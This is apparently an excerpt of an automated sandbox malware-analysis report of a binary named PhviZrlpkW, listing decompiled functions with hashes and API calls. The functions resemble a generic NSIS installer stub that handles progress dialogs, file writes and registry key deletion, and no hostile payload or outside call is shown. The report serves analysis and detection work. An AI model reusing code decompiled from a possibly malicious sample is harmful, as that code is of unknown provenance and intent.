                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: File$Pointer$ByteCharMultiWide$Read
                    • String ID: 9
                    • API String ID: 163830602-2366072709
                    • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                    • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                    • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                    • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                    0x004068f1
                    0x004068fa
                    0x00406911
                    0x00406911
                    0x00406918
                    0x00406924
                    0x00406924
                    0x00406927
                    0x0040692a
                    0x0040692f
                    0x00406931
                    0x0040693a
                    0x0040693e
                    0x0040695b
                    0x00406963
                    0x00406963
                    0x00406968
                    0x0040696a
                    0x0040696d
                    0x00406972
                    0x00406973
                    0x00406977
                    0x00406977
                    0x00406978
                    0x0040697f
                    0x00406981
                    0x00406988
                    0x00000000
                    0x00000000
                    0x00406990
                    0x00406996
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406996
                    0x0040699b

                    APIs
                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                    • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                    • CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                    • CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 589700163-4010320282
                    • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                    • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                    • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                    • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                    0x0040303d
                    0x0040303f
                    0x00403046
                    0x00403049
                    0x00403049
                    0x0040304f
                    0x00000000
                    0x0040304f
                    0x0040305d
                    0x00000000
                    0x00403060
                    0x00403067
                    0x00403073
                    0x0040307b
                    0x004030b9
                    0x004030c2
                    0x00000000
                    0x004030c7
                    0x00403084
                    0x00403095
                    0x00000000
                    0x004030a3
                    0x00403084
                    0x004030cf

                    APIs
                    • DestroyWindow.USER32(?,00000000), ref: 00403049
                    • GetTickCount.KERNEL32 ref: 00403067
                    • wsprintfW.USER32 ref: 00403095
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                    • CreateDialogParamW.USER32 ref: 004030B9
                    • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                      • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                    • String ID: ... %d%%
                    • API String ID: 722711167-2449383134
                    • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                    • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                    • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                    • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                    0x00404f8d
                    0x00404f9a
                    0x00404fa0
                    0x00404fde
                    0x00404fde
                    0x00404fed
                    0x00404ff4
                    0x00000000
                    0x00404ff6
                    0x00404fa2
                    0x00404fb1
                    0x00404fb9
                    0x00404fbc
                    0x00404fce
                    0x00404fd4
                    0x00404fdb
                    0x00000000
                    0x00404fdb
                    0x00000000

                    APIs
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                    • GetMessagePos.USER32 ref: 00404FA2
                    • ScreenToClient.USER32 ref: 00404FBC
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                    0x00402fa3
                    0x00402fb1
                    0x00402fb7
                    0x00402fb7
                    0x00402fc5
                    0x00402fc7
                    0x00402fd3
                    0x00402fd8
                    0x00402fda
                    0x00402fda
                    0x00402fe5
                    0x00402ff5
                    0x00403007
                    0x00403007
                    0x0040300f

                    APIs
                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                    • wsprintfW.USER32 ref: 00402FE5
                    • SetWindowTextW.USER32(?,?), ref: 00402FF5
                    • SetDlgItemTextW.USER32 ref: 00403007
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                    • API String ID: 1451636040-1158693248
                    • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                    • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                    • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                    • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                    0x00402950
                    0x00402952
                    0x00402957
                    0x0040295c
                    0x0040295f
                    0x00402969
                    0x0040296d
                    0x0040296d
                    0x00402973
                    0x00402980
                    0x00402988
                    0x0040298b
                    0x00402997
                    0x0040299a
                    0x004029a0
                    0x004029ae
                    0x004029b3
                    0x004029b7
                    0x004029ba
                    0x004029c3
                    0x004029cf
                    0x004029d3
                    0x004029d6
                    0x004029e0
                    0x004029ff
                    0x004029e7
                    0x004029ec
                    0x004029f4
                    0x004029f7
                    0x004029fc
                    0x004029fc
                    0x00402a06
                    0x00402a06
                    0x00402a13
                    0x00402a19
                    0x00402a1f
                    0x00402a1f
                    0x004029b7
                    0x00402a33
                    0x00402a35
                    0x00402a35
                    0x00402a3f
                    0x00402a40
                    0x00402a44
                    0x00402a48
                    0x00402a4e
                    0x00402a4e
                    0x00402a55
                    0x004022f1
                    0x00402c2d
                    0x00402c39

                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                    • GlobalFree.KERNEL32 ref: 00402A06
                    • GlobalFree.KERNEL32 ref: 00402A19
                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                    • String ID:
                    • API String ID: 2667972263-0
                    • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                    • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                    • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                    • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                    0x00404e7a
                    0x00404e7f
                    0x00404e87
                    0x00404e88
                    0x00404e95
                    0x00404e9d
                    0x00404e9e
                    0x00404ea0
                    0x00404ea2
                    0x00404ea4
                    0x00404ea7
                    0x00404ea7
                    0x00404eae
                    0x00404eb4
                    0x00404eb4
                    0x00404ebb
                    0x00404ec2
                    0x00404ec5
                    0x00404ec8
                    0x00404ec8
                    0x00404ecc
                    0x00404edc
                    0x00404ede
                    0x00404ee1
                    0x00404e8a
                    0x00404e8a
                    0x00404e91
                    0x00404e91
                    0x00404ee9
                    0x00404ef4
                    0x00404f0a
                    0x00404f1b
                    0x00404f37

                    APIs
                    • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                    • wsprintfW.USER32 ref: 00404F1B
                    • SetDlgItemTextW.USER32 ref: 00404F2E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s$H7B
                    • API String ID: 3540041739-107966168
                    • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                    • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                    • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                    • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 48%
                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                    0x00402eb4
                    0x00402ebd
                    0x00402ec6
                    0x00402ed2
                    0x00402edb
                    0x00402ee5
                    0x00402f0a
                    0x00402f10
                    0x00402f15
                    0x00402f16
                    0x00402f46
                    0x00402f1f
                    0x00402f21
                    0x00402f71
                    0x00402f74
                    0x00000000
                    0x00402f7a
                    0x00402f30
                    0x00402f35
                    0x00402f37
                    0x00000000
                    0x00000000
                    0x00402f3f
                    0x00402f44
                    0x00402f45
                    0x00402f45
                    0x00402f52
                    0x00402f5a
                    0x00402f61
                    0x00000000
                    0x00402f8a
                    0x00000000
                    0x00402f69
                    0x00402ef5
                    0x00402f08
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402f08
                    0x00402f90

                    APIs
                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
